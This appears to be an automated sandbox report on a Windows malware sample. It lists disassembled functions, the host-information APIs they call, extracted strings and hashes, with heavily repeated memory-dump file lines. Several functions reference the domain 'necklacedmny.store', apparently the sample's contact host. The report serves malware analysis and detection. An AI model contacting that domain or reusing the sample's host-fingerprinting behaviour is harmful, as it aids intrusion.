Associated: 00000000.00000002.2272796191.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272830256.00000000004C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272854601.00000000004C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272879944.00000000004D6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272910638.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272932606.00000000004DC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272954524.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272975467.00000000004E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.00000000004E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273095154.0000000000530000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273119190.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000537000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273199466.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273219109.0000000000548000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_file.jbxd

Similarity

API ID:
String ID: &A-C$5Q<S$6$6E+G$7U9W$8]S_$<Y?[$>M"O$E-A/$I)^+$M%E'$O9M;$P!N#$dc$eI?K$jabc
API String ID: 0-600622405
Opcode ID: 0f424e52fc5c250bd1b327ba0ee6fe227b353cbc677091bf1a593db4da52d057
Instruction ID: 94b6d3e33c62376eec83f1fa82927ed63ab554da763fd5a6cb311c8159fefc0b
Opcode Fuzzy Hash: 0f424e52fc5c250bd1b327ba0ee6fe227b353cbc677091bf1a593db4da52d057
Instruction Fuzzy Hash: 72D1267162C3918FD728CF24D4903ABBBE2ABD1314F19892DE4D94B352D775890ACB92

Function 0027BCA9 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 350
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32(49FB4BE2), ref: 0027BD1D
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0027BD68
SysFreeString.OLEAUT32(?), ref: 0027C0A4
SysFreeString.OLEAUT32(?), ref: 0027C0AA
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,49FB4BE2,00000000,00000000,00000000,00000000), ref: 0027C0F7

Strings

WC, xrefs: 0027BE0D
ZQ, xrefs: 0027BDFD

Memory Dump Source

Source File: 00000000.00000002.2268425519.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.2268401414.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268464515.0000000000299000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268480630.000000000029B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268542582.00000000002A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268560367.00000000002A6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268587007.00000000002A7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270011469.00000000003FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270381458.00000000003FE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272192016.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272210872.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272235431.0000000000439000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272254145.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272285593.0000000000459000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272311858.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272333201.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272354348.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272385298.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272419556.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272443007.000000000048A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272467540.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272501397.000000000048E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272553176.0000000000494000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272586772.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272608276.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272629702.00000000004A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272651656.00000000004A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272670209.00000000004A9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272698338.00000000004AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272720769.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272748173.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272774711.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272796191.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272830256.00000000004C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272854601.00000000004C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272879944.00000000004D6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272910638.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272932606.00000000004DC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272954524.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272975467.00000000004E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.00000000004E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273095154.0000000000530000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273119190.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000537000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273199466.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273219109.0000000000548000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_file.jbxd

Similarity

API ID: String$Free$AllocBlanketInformationProxyVolume
String ID: WC$ZQ
API String ID: 1773362589-1722601914
Opcode ID: 51304aee344231c22ba75eeac620f96b3cef34f3a59930a3572b8a8cfce7118e
Instruction ID: b343eaac268505e3f70e51634238fbfa6a4def6b6b14f2a37b9af76f70b11077
Opcode Fuzzy Hash: 51304aee344231c22ba75eeac620f96b3cef34f3a59930a3572b8a8cfce7118e
Instruction Fuzzy Hash: 16C1CB76609341AFE710DF64E845B5BBBE5FFC6314F14882CF1849B2A0DB75990ACB82

Function 0024E1A0 Relevance: 11.8, Strings: 9, Instructions: 540
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

B$, xrefs: 0024E736
Ehrd, xrefs: 0024E68F
R$, xrefs: 0024E82C
necklacedmny.store, xrefs: 0024E44E
i[k], xrefs: 0024E4C3
$, xrefs: 0024E3B7, 0024E3CF
txLL, xrefs: 0024E697
n|of, xrefs: 0024E6A7
b$, xrefs: 0024E952

Memory Dump Source

Source File: 00000000.00000002.2268425519.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.2268401414.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268464515.0000000000299000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268480630.000000000029B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268542582.00000000002A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268560367.00000000002A6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268587007.00000000002A7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270011469.00000000003FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270381458.00000000003FE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272192016.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272210872.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272235431.0000000000439000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272254145.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272285593.0000000000459000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272311858.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272333201.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272354348.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272385298.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272419556.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272443007.000000000048A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272467540.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272501397.000000000048E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272553176.0000000000494000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272586772.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272608276.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272629702.00000000004A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272651656.00000000004A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272670209.00000000004A9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272698338.00000000004AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272720769.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272748173.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272774711.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272796191.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272830256.00000000004C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272854601.00000000004C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272879944.00000000004D6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272910638.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272932606.00000000004DC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272954524.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272975467.00000000004E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.00000000004E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273095154.0000000000530000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273119190.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000537000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273199466.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273219109.0000000000548000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_file.jbxd

Similarity

API ID:
String ID: B$$Ehrd$R$$b$$i[k]$necklacedmny.store$n|of$txLL$$
API String ID: 0-2541111326
Opcode ID: 4c9f2394588c64b4f8ddf5a8752693af11754dd9ed35b0342774a9d26cddc26a
Instruction ID: 883d6500311313b7e263b1574fc590daee754bbbd30066b15ab4a2f2947bd7d5
Opcode Fuzzy Hash: 4c9f2394588c64b4f8ddf5a8752693af11754dd9ed35b0342774a9d26cddc26a
Instruction Fuzzy Hash: 41023479919341CFD708CF24ED8626BBBE1FB85304F18492CE8959B352E7358919CF92

Function 00250460 Relevance: 11.7, Strings: 9, Instructions: 454
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

#i4g, xrefs: 0025056B
@-+, xrefs: 002504C2
!m%k, xrefs: 00250560
+e(c, xrefs: 00250576
necklacedmny.store, xrefs: 00250778
y)v', xrefs: 002504CA
yw, xrefs: 0025053F
g!~_, xrefs: 002504DA
v%r#, xrefs: 002504D2

Memory Dump Source

Source File: 00000000.00000002.2268425519.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.2268401414.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268464515.0000000000299000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268480630.000000000029B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268542582.00000000002A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268560367.00000000002A6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268587007.00000000002A7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270011469.00000000003FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270381458.00000000003FE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272192016.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272210872.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272235431.0000000000439000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272254145.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272285593.0000000000459000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272311858.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272333201.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272354348.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272385298.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272419556.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272443007.000000000048A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272467540.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272501397.000000000048E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272553176.0000000000494000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272586772.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272608276.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272629702.00000000004A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272651656.00000000004A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272670209.00000000004A9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272698338.00000000004AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272720769.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272748173.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272774711.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272796191.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272830256.00000000004C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272854601.00000000004C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272879944.00000000004D6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272910638.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272932606.00000000004DC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272954524.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272975467.00000000004E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.00000000004E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273095154.0000000000530000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273119190.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000537000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273199466.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273219109.0000000000548000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_file.jbxd

Similarity

API ID:
String ID: !m%k$#i4g$+e(c$@-+$g!~_$necklacedmny.store$v%r#$y)v'$yw
API String ID: 0-3070082895
Opcode ID: 9f8c7d5d7764848e7abed8385e479df1be1232bfb16c59500e73eb9c7bc2a23c
Instruction ID: c09dad9f1bbb70bee6fe55a98256710b8b68d8075f4ba56bac9b3ad825e483cd
Opcode Fuzzy Hash: 9f8c7d5d7764848e7abed8385e479df1be1232bfb16c59500e73eb9c7bc2a23c
Instruction Fuzzy Hash: 2BF199B511D381DFE3248F24E8887ABBBE4FB89300F14892DE9D99B251D7798845CF52

Function 0026F9D0 Relevance: 10.1, APIs: 3, Strings: 2, Instructions: 1324COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0026F9FB
GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0026FABA

Strings

\X"Q, xrefs: 00270619
a|cI, xrefs: 00270620

Memory Dump Source

Source File: 00000000.00000002.2268425519.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.2268401414.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268464515.0000000000299000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268480630.000000000029B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268542582.00000000002A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268560367.00000000002A6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268587007.00000000002A7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270011469.00000000003FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270381458.00000000003FE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272192016.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272210872.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272235431.0000000000439000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272254145.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272285593.0000000000459000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272311858.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272333201.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272354348.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272385298.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272419556.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272443007.000000000048A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272467540.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272501397.000000000048E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272553176.0000000000494000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272586772.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272608276.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272629702.00000000004A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272651656.00000000004A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272670209.00000000004A9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272698338.00000000004AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272720769.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272748173.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272774711.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272796191.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272830256.00000000004C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272854601.00000000004C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272879944.00000000004D6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272910638.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272932606.00000000004DC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272954524.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272975467.00000000004E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.00000000004E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273095154.0000000000530000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273119190.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000537000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273199466.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273219109.0000000000548000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_file.jbxd

Similarity

API ID: ComputerName
String ID: \X"Q$a|cI
API String ID: 3545744682-3233608862
Opcode ID: ab4edb95df01eba50e02d63bfcae86da7ced7a578bb446ecaf995f0463fce4bf
Instruction ID: acfe3d8e320b2d0d403cb2d372dbeffbd5a51473ef16a0eed2f792bdf58e54c0
Opcode Fuzzy Hash: ab4edb95df01eba50e02d63bfcae86da7ced7a578bb446ecaf995f0463fce4bf
Instruction Fuzzy Hash: 059228316147828FD7198F39C4A0762BBE2EF96314F28C5ADC4DA8B792C779D846CB50

Function 002679B0 Relevance: 8.0, Strings: 6, Instructions: 507
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Mx, xrefs: 00267E14
Dw, xrefs: 00267CAF
n~, xrefs: 00267C97
wE, xrefs: 00267E0C
qVw, xrefs: 00267F66
DG, xrefs: 00267C9F

Memory Dump Source

Source File: 00000000.00000002.2268425519.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.2268401414.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268464515.0000000000299000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268480630.000000000029B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268542582.00000000002A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268560367.00000000002A6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268587007.00000000002A7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270011469.00000000003FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270381458.00000000003FE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272192016.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272210872.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272235431.0000000000439000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272254145.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272285593.0000000000459000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272311858.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272333201.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272354348.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272385298.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272419556.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272443007.000000000048A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272467540.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272501397.000000000048E000.00000080.00000001.01000000.00000003.sdmpDownload File
